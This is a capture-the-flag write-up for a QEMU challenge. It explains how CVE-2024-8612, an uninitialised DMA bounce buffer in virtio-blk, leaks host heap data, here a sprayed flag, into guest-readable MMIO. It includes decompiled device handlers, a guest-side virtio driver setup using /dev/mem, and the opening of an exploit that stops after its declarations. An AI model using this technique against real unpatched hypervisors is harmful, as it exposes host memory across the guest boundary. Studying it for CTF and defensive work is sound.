QEMU PWN - EasyDMA
From: ACTF 2025
The challenge provides a stripped QEMU binary, qemu-system-x86_64, launched with the following arguments:
timeout --foreground 300 ./qemu-system-x86_64 \
    -L pc-bios \
    -m 1024 \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -drive file=null-co://,if=none,id=mydisk \
    -device virtio-blk-pci,drive=mydisk,ioeventfd=off \
    -device readflag \
    -append "priority=low console=ttyS0" \
    -monitor /dev/null \
    -nographic
Two extra devices are attached: virtio-blk-pci (with ioeventfd=off, queue notifications are handled synchronously in the vCPU thread) and readflag. Both can be located from inside the guest via sysfs, as sketched below.
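A quick way to confirm where the two devices landed is to read the vendor/device IDs from their PCI config space. This is a minimal sketch; the BDFs 00:04.0 and 00:05.0 are the ones used throughout this write-up:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    const char *paths[] = {
        "/sys/devices/pci0000:00/0000:00:04.0/config", /* virtio-blk-pci */
        "/sys/devices/pci0000:00/0000:00:05.0/config", /* readflag */
    };
    for (int i = 0; i < 2; i++) {
        uint16_t id[2] = {0, 0};     /* first 4 config bytes: vendor, device */
        int fd = open(paths[i], O_RDONLY);
        if (fd < 0)
            continue;
        read(fd, id, sizeof(id));
        close(fd);
        printf("%s: vendor %04x device %04x\n", paths[i], id[0], id[1]);
    }
    return 0;
}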
Disassembling the binary, we can find the readflag device's MMIO read and write callbacks:
__int64 __fastcall readflag_mmio_read(__int64 opaque, unsigned __int64 addr, int size)
{
    __int64 result; // rax

    if ( addr > 0x7F )
    {
        result = -1LL;
        if ( size != 4 )
            return result;
    }
    else if ( size != 4 )
    {
        result = -1LL;
        if ( size != 8 )
            return result;
    }
    result = 0xDEADBEEFLL;
    if ( addr )
    {
        if ( addr == 8 )
            return *(_QWORD *)(opaque + 2984);
        else
            return -1LL;
    }
    return result;
}
void __fastcall readflag_mmio_write(__int64 opaque, unsigned __int64 addr, size_t val, int size)
{
    void *v4; // rbp
    FILE *v5; // rax
    FILE *v6; // r12
    size_t v7; // rax
    int v8; // [rsp+0h] [rbp-20h]

    if ( addr > 0x7F )
    {
        if ( size != 4 )
            return;
    }
    else if ( size != 4 )
    {
        if ( size == 8 && addr == 8 )
            goto LABEL_6;
        return;
    }
    if ( addr )
    {
        if ( addr == 8 )
LABEL_6:
            *(_QWORD *)(opaque + 2984) = val;
    }
    else if ( val <= 0xFFF )
    {
        v8 = val;
        v4 = malloc(val);
        if ( v4 )
        {
            v5 = fopen64("flag", "r");
            v6 = v5;
            if ( v5 )
            {
                v7 = fread(v4, 1uLL, (unsigned int)(v8 - 1), v5);
                if ( v7 )
                    *((_BYTE *)v4 + v7) = 0;
                else
                    puts("No data read from the file.");
                free(v4);
                fclose(v6);
            }
            else
            {
                perror("Error opening file");
                free(v4);
            }
        }
        else
        {
            perror("Memory allocation failed");
        }
    }
}
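To summarize the two handlers: a 4-byte write of a size value (at most 0xfff) to offset 0 makes the device malloc() a buffer of that size, fread() the flag into it, and immediately free() it, leaving flag bytes behind in freed heap chunks; offset 8 is a read/write scratch qword at opaque + 2984, and reads from offset 0 return 0xDEADBEEF. A minimal sketch of driving the flag-read path, assuming the device's BAR0 at 00:05.0 as used later:

#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

/* One spray iteration: the device mallocs `size` bytes, freads the flag
 * into them, then frees the buffer, leaving flag bytes in freed chunks. */
void poke_readflag(uint32_t size)
{
    int fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0",
                  O_RDWR | O_SYNC);
    volatile uint32_t *regs = mmap(0, 0x1000, PROT_READ | PROT_WRITE,
                                   MAP_SHARED, fd, 0);
    regs[0] = size;   /* offset 0, 4-byte write: triggers the flag read */
    munmap((void *)regs, 0x1000);
    close(fd);
}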
Virtio Block Device
Data type definitions
For the integer data types used in the structure definitions, the following conventions are used:
u8, u16, u32, u64
An unsigned integer of the specified length in bits.
le16, le32, le64
An unsigned integer of the specified length in bits, in little-endian byte order.
PCI Capabilities
struct virtio_pci_cap {
    u8 cap_vndr;    /* Generic PCI field: PCI_CAP_ID_VNDR */
    u8 cap_next;    /* Generic PCI field: next ptr. */
    u8 cap_len;     /* Generic PCI field: capability length */
    u8 cfg_type;    /* Identifies the structure. */
    u8 bar;         /* Where to find it. */
    u8 id;          /* Multiple capabilities of the same type */
    u8 padding[2];  /* Pad to full dword. */
    le32 offset;    /* Offset within bar. */
    le32 length;    /* Length of the structure, in bytes. */
};
cfg_type identifies the structure, according to the following table:
/* Common configuration */
#define VIRTIO_PCI_CAP_COMMON_CFG    1
/* Notifications */
#define VIRTIO_PCI_CAP_NOTIFY_CFG    2
/* ISR Status */
#define VIRTIO_PCI_CAP_ISR_CFG       3
/* Device specific configuration */
#define VIRTIO_PCI_CAP_DEVICE_CFG    4
/* PCI configuration access */
#define VIRTIO_PCI_CAP_PCI_CFG       5
/* Shared memory region */
#define VIRTIO_PCI_CAP_SHARED_MEMORY 8
/* Vendor-specific data */
#define VIRTIO_PCI_CAP_VENDOR_CFG    9
For the common configuration, the layout is:
struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select;     /* read-write */
    le32 device_feature;            /* read-only for driver */
    le32 driver_feature_select;     /* read-write */
    le32 driver_feature;            /* read-write */
    le16 config_msix_vector;        /* read-write */
    le16 num_queues;                /* read-only for driver */
    u8 device_status;               /* read-write */
    u8 config_generation;           /* read-only for driver */

    /* About a specific virtqueue. */
    le16 queue_select;              /* read-write */
    le16 queue_size;                /* read-write */
    le16 queue_msix_vector;         /* read-write */
    le16 queue_enable;              /* read-write */
    le16 queue_notify_off;          /* read-only for driver */
    le64 queue_desc;                /* read-write */
    le64 queue_driver;              /* read-write */
    le64 queue_device;              /* read-write */
    le16 queue_notif_config_data;   /* read-only for driver */
    le16 queue_reset;               /* read-write */

    /* About the administration virtqueue. */
    le16 admin_queue_index;         /* read-only for driver */
    le16 admin_queue_num;           /* read-only for driver */
};
For notifications, the layout is:
struct virtio_pci_notify_cap {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier; /* Multiplier for queue_notify_off. */
};
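The notification ("doorbell") address of a queue is derived from this capability together with the queue's queue_notify_off field from the common configuration. A minimal sketch, assuming the structures above and that notify_cap is a copy of the capability read from PCI config space:

#include <stdint.h>

static inline void *queue_notify_addr(char *bar_base,
                                      const struct virtio_pci_notify_cap *notify_cap,
                                      uint16_t queue_notify_off)
{
    /* Per the virtio PCI transport: cap.offset + queue_notify_off * multiplier */
    return bar_base + notify_cap->cap.offset +
           (uint32_t)queue_notify_off * notify_cap->notify_off_multiplier;
}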
We recognize these capability types and record their offsets:
void print_cap(struct virtio_pci_cap* cap){
    printf("cap_len: %x\n", cap->cap_len);
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:
            printf("cfg_type: common\n");
            break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:
            printf("cfg_type: notify\n");
            break;
        case VIRTIO_PCI_CAP_ISR_CFG:
            printf("cfg_type: isr\n");
            break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:
            printf("cfg_type: device\n");
            break;
        case VIRTIO_PCI_CAP_PCI_CFG:
            printf("cfg_type: pci\n");
            break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY:
            printf("cfg_type: shared memory\n");
            break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:
            printf("cfg_type: vendor\n");
            break;
        default:
            printf("cfg_type: unknown\n");
            break;
    }
    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}
switch(cap.cfg_type){
    case VIRTIO_PCI_CAP_COMMON_CFG:
        virtio_common_mmio = virtio_mmio + cap.offset;
        break;
    case VIRTIO_PCI_CAP_NOTIFY_CFG:
        virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
        break;
    case VIRTIO_PCI_CAP_ISR_CFG:
        virtio_isr_mmio = virtio_mmio + cap.offset;
        break;
    case VIRTIO_PCI_CAP_DEVICE_CFG:
        virtio_device_mmio = virtio_mmio + cap.offset;
        break;
    default:
        break;
}
Virtqueue
The mechanism for bulk data transport on virtio devices is pretentiously called a virtqueue. Each device can have zero or more virtqueues.
Each virtqueue can consist of up to 3 parts:
• Descriptor Area - used for describing buffers
• Driver Area - extra data supplied by driver to the device. Also called avail virtqueue.
• Device Area - extra data supplied by device to driver. Also called used virtqueue.

These areas' structures are defined below:
struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;

/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT     1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE    2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};
struct virtq_avail {
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;
    /*
     * The number of bytes written into the device writable portion of
     * the buffer described by the descriptor chain.
     */
    le32 len;
};

struct virtq_used {
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};
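To submit a descriptor chain, the driver writes the chain's head index into the avail ring, publishes the new idx, and then rings the doorbell; the device consumes the chain and reports it back in the used ring. A minimal sketch, assuming the structures above plus a VIRTIO_QUEUE_SIZE constant and a doorbell address derived from the notify capability:

#include <stdint.h>

/* Publish the chain whose head descriptor index is `head`, then notify
 * queue 0 by writing the queue index to its doorbell register. */
static void submit_and_notify(volatile struct virtq_avail *avail,
                              volatile uint16_t *doorbell, uint16_t head)
{
    avail->ring[avail->idx % VIRTIO_QUEUE_SIZE] = head;
    __asm__ volatile("mfence" ::: "memory"); /* ring entry visible before idx */
    avail->idx++;
    __asm__ volatile("mfence" ::: "memory"); /* idx visible before the doorbell */
    *doorbell = 0;
}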
The driver queues requests to the virtqueue; the type of each request is either a read (VIRTIO_BLK_T_IN), a write (VIRTIO_BLK_T_OUT), a discard (VIRTIO_BLK_T_DISCARD), a write-zeroes (VIRTIO_BLK_T_WRITE_ZEROES), or a flush (VIRTIO_BLK_T_FLUSH).
struct virtio_blk_req {
    le32 type;
    le32 reserved;
    le64 sector;
    u8 data[][512];
    u8 status;
};
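A request is typically split across a three-descriptor chain: a 16-byte device-readable header (type, reserved, sector), the data buffer(s), and a single device-writable status byte. A minimal sketch, assuming the virtq_desc definition and VIRTQ_DESC_F_* flags above; all addr values are guest-physical and the names are illustrative:

#include <stdint.h>

static void build_blk_request(volatile struct virtq_desc *desc,
                              uint64_t hdr_pa, uint64_t data_pa,
                              uint32_t data_len, uint64_t status_pa)
{
    desc[0].addr  = hdr_pa;     /* le32 type; le32 reserved; le64 sector */
    desc[0].len   = 16;
    desc[0].flags = VIRTQ_DESC_F_NEXT;             /* device read-only */
    desc[0].next  = 1;
    desc[1].addr  = data_pa;    /* device-writable for VIRTIO_BLK_T_IN */
    desc[1].len   = data_len;
    desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
    desc[1].next  = 2;
    desc[2].addr  = status_pa;  /* u8 status: OK / IOERR / UNSUPP */
    desc[2].len   = 1;
    desc[2].flags = VIRTQ_DESC_F_WRITE;
    desc[2].next  = 0;
}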
struct virtio_blk_discard_write_zeroes {
    le64 sector;
    le32 num_sectors;
    struct {
        le32 unmap:1;
        le32 reserved:31;
    } flags;
};
MMIO
Memory-mapped I/O (MMIO) uses the same address space to address both main memory and I/O devices. The memory and registers of the I/O devices are mapped to (associated with) address values, so a memory address may refer to either a portion of physical RAM or to memory and registers of the I/O device.
uint8_t mmio_read8(void* addr){
    return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
    return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
    return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
    return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
    *(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
    *(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
    *(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
    *(volatile uint64_t*)addr = val;
}
Device configuration layout
struct virtio_blk_config {
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
    struct virtio_blk_zoned_characteristics {
        le32 zone_sectors;
        le32 max_open_zones;
        le32 max_active_zones;
        le32 max_append_sectors;
        le32 write_granularity;
        u8 model;
        u8 unused2[3];
    } zoned;
};
Initialization
- Read the PCI capabilities
- Reset the device and negotiate (empty) features
- Set up the virtqueue
void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }
    close(fd);

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    // walk the PCI capability list; the offset of the first capability is at config+0x34
    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){ // only vendor-specific capabilities (PCI_CAP_ID_VNDR)
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset the device, then negotiate an empty feature set
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);

    // allocate DMA memory: map /dev/mem at a fixed address equal to the file
    // offset, so virtual addresses in this region equal guest-physical ones
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;       // 16 descriptors * 16 bytes = 0x100
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // set up queue 0
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}
Vulnerabilities
CVE-2024-8612
Strings in the binary reveal the QEMU version as qemu-8.0.0-rc2, which is affected by an information-leak vulnerability involving virtio-blk-pci: CVE-2024-8612.
For exploitation details, see also HEXACON2024 - DMAKiller: DMA to Escape from QEMU/KVM by Yongkang Jia, Yiming Tao & Xiao Lei.
When the address accessed by DMA is backed by MMIO rather than RAM, QEMU falls back to a bounce buffer:
/* Map a physical memory region into a host virtual address.
 * May map a subset of the requested range, given by and returned in *plen.
 * May return NULL if resources needed to perform the mapping are exhausted.
 * Use only for reads OR writes - not for read-modify-write operations.
 * Use cpu_register_map_client() to know when retrying the map operation is
 * likely to succeed.
 */
void *address_space_map(AddressSpace *as,
                        hwaddr addr,
                        hwaddr *plen,
                        bool is_write,
                        MemTxAttrs attrs)
{
    hwaddr len = *plen;
    hwaddr l, xlat;
    MemoryRegion *mr;
    FlatView *fv;

    if (len == 0) {
        return NULL;
    }

    l = len;
    RCU_READ_LOCK_GUARD();
    fv = address_space_to_flatview(as);
    mr = flatview_translate(fv, addr, &xlat, &l, is_write, attrs);

    if (!memory_access_is_direct(mr, is_write)) {
        if (qatomic_xchg(&bounce.in_use, true)) {
            *plen = 0;
            return NULL;
        }
        /* Avoid unbounded allocations */
        l = MIN(l, TARGET_PAGE_SIZE);
        bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l);
        bounce.addr = addr;
        bounce.len = l;

        memory_region_ref(mr);
        bounce.mr = mr;
        if (!is_write) {
            flatview_read(fv, addr, MEMTXATTRS_UNSPECIFIED,
                          bounce.buffer, l);
        }

        *plen = l;
        return bounce.buffer;
    }
    //...
}
Moreover, the memory returned by qemu_memalign is never initialized: for a device-writable mapping (is_write == true), the flatview_read above is skipped, so the bounce buffer starts out filled with stale QEMU heap data.
static int virtio_blk_handle_request(VirtIOBlockReq *req, MultiReqBuffer *mrb)
{
    uint32_t type;
    struct iovec *in_iov = req->elem.in_sg;
    struct iovec *out_iov = req->elem.out_sg;
    unsigned in_num = req->elem.in_num;
    unsigned out_num = req->elem.out_num;
    VirtIOBlock *s = req->dev;
    VirtIODevice *vdev = VIRTIO_DEVICE(s);

    if (req->elem.out_num < 1 || req->elem.in_num < 1) {
        virtio_error(vdev, "virtio-blk missing headers");
        return -1;
    }

    if (unlikely(iov_to_buf(out_iov, out_num, 0, &req->out,
                            sizeof(req->out)) != sizeof(req->out))) {
        virtio_error(vdev, "virtio-blk request outhdr too short");
        return -1;
    }

    iov_discard_front_undoable(&out_iov, &out_num, sizeof(req->out),
                               &req->outhdr_undo);

    if (in_iov[in_num - 1].iov_len < sizeof(struct virtio_blk_inhdr)) {
        virtio_error(vdev, "virtio-blk request inhdr too short");
        iov_discard_undo(&req->outhdr_undo);
        return -1;
    }
    //...
    req->in_len = iov_size(in_iov, in_num);
    //...
    case VIRTIO_BLK_T_IN:
    {
        bool is_write = type & VIRTIO_BLK_T_OUT;
        req->sector_num = virtio_ldq_p(vdev, &req->out.sector);

        if (is_write) {
            qemu_iovec_init_external(&req->qiov, out_iov, out_num);
            trace_virtio_blk_handle_write(vdev, req, req->sector_num,
                                          req->qiov.size / BDRV_SECTOR_SIZE);
        } else {
            qemu_iovec_init_external(&req->qiov, in_iov, in_num);
            trace_virtio_blk_handle_read(vdev, req, req->sector_num,
                                         req->qiov.size / BDRV_SECTOR_SIZE);
        }

        if (!virtio_blk_sect_range_ok(s, req->sector_num, req->qiov.size)) {
            virtio_blk_req_complete(req, VIRTIO_BLK_S_IOERR);
            block_acct_invalid(blk_get_stats(s->blk),
                               is_write ? BLOCK_ACCT_WRITE : BLOCK_ACCT_READ);
            virtio_blk_free_request(req);
            return 0;
        }
    //...
    default:
        virtio_blk_req_complete(req, VIRTIO_BLK_S_UNSUPP);
        virtio_blk_free_request(req);
    }
In virtio_blk_handle_request, the size of the device-writable part is recorded in req->in_len even when the request is invalid. For an unsupported type, virtio_blk_req_complete is called directly, giving the call chain:

virtio_blk_handle_request -> virtio_blk_req_complete -> virtqueue_push -> virtqueue_fill -> virtqueue_unmap_sg -> dma_memory_unmap -> address_space_unmap -> address_space_write
On the unmap side, the whole bounce buffer is written back to the original target address:
void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len,
                         bool is_write, hwaddr access_len)
{
    //...
    if (is_write) {
        address_space_write(as, bounce.addr, MEMTXATTRS_UNSPECIFIED,
                            bounce.buffer, access_len);
    }
    //...
}
Because nothing prevents it, stale heap data is thus written into the device's own Common configuration MMIO region, part of which can then be read back out by the driver.
Exploit
Heap-spray the flag string into freed QEMU heap memory via the readflag device, then use the vulnerability above to leak it: an invalid virtio-blk request whose device-writable descriptor points at the virtio MMIO window forces the uninitialized bounce buffer (now carrying flag bytes) to be written back into the common configuration region, where we read it out. The full exploit follows.
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Integer type aliases, following the virtio spec naming. */
typedef uint8_t  u8;
typedef uint16_t u16;
typedef uint16_t le16;
typedef uint32_t le32;
typedef uint64_t le64;

/* Queue size: 16 descriptors, inferred from the 0x100/0x200 ring offsets below. */
#define VIRTIO_QUEUE_SIZE 16

struct virtio_pci_cap {
    u8 cap_vndr;
    u8 cap_next;
    u8 cap_len;
    u8 cfg_type;
    u8 bar;
    u8 id;
    u8 padding[2];
    le32 offset;
    le32 length;
};
struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select;     /* read-write */
    le32 device_feature;            /* read-only for driver */
    le32 driver_feature_select;     /* read-write */
    le32 driver_feature;            /* read-write */
    le16 config_msix_vector;        /* read-write */
    le16 num_queues;                /* read-only for driver */
    u8 device_status;               /* read-write */
    u8 config_generation;           /* read-only for driver */

    /* About a specific virtqueue. */
    le16 queue_select;              /* read-write */
    le16 queue_size;                /* read-write */
    le16 queue_msix_vector;         /* read-write */
    le16 queue_enable;              /* read-write */
    le16 queue_notify_off;          /* read-only for driver */
    le64 queue_desc;                /* read-write */
    le64 queue_driver;              /* read-write */
    le64 queue_device;              /* read-write */
    le16 queue_notify_data;         /* read-only for driver */
    le16 queue_reset;               /* read-write */
};
struct virtio_notify_cfg {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier;
};
struct virtio_blk_config{
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
};
enum virtio_pci_cfg_type{
    VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
    VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
    VIRTIO_PCI_CAP_ISR_CFG = 0x3,
    VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
    VIRTIO_PCI_CAP_PCI_CFG = 0x5,
    VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
    VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};
/* Feature bits */
/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE 1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER      2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK   4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK 8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET 0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED      0x80
struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;

/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT     1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE    2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};
struct virtq_avail {
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;
    /*
     * The number of bytes written into the device writable portion of
     * the buffer described by the descriptor chain.
     */
    le32 len;
};

struct virtq_used {
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};
struct virtio_blk_req {
    le32 type;
    le32 reserved;
    le64 sector;
    u8 data[0];
    // u8 status; /* supplied via its own device-writable descriptor instead */
};
void print_cap(struct virtio_pci_cap* cap){
    printf("cap_len: %x\n", cap->cap_len);
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:
            printf("cfg_type: common\n");
            break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:
            printf("cfg_type: notify\n");
            break;
        case VIRTIO_PCI_CAP_ISR_CFG:
            printf("cfg_type: isr\n");
            break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:
            printf("cfg_type: device\n");
            break;
        case VIRTIO_PCI_CAP_PCI_CFG:
            printf("cfg_type: pci\n");
            break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY:
            printf("cfg_type: shared memory\n");
            break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:
            printf("cfg_type: vendor\n");
            break;
        default:
            printf("cfg_type: unknown\n");
            break;
    }
    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}
void ERR(const char* buf){
    perror(buf);
    abort();
}

void LOG(const char* buf){
    write(2, buf, strlen(buf));
}
volatile char* readflag_mmio = NULL;
volatile char* virtio_mmio = NULL;
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
volatile struct virtq_desc* queue_desc = NULL;
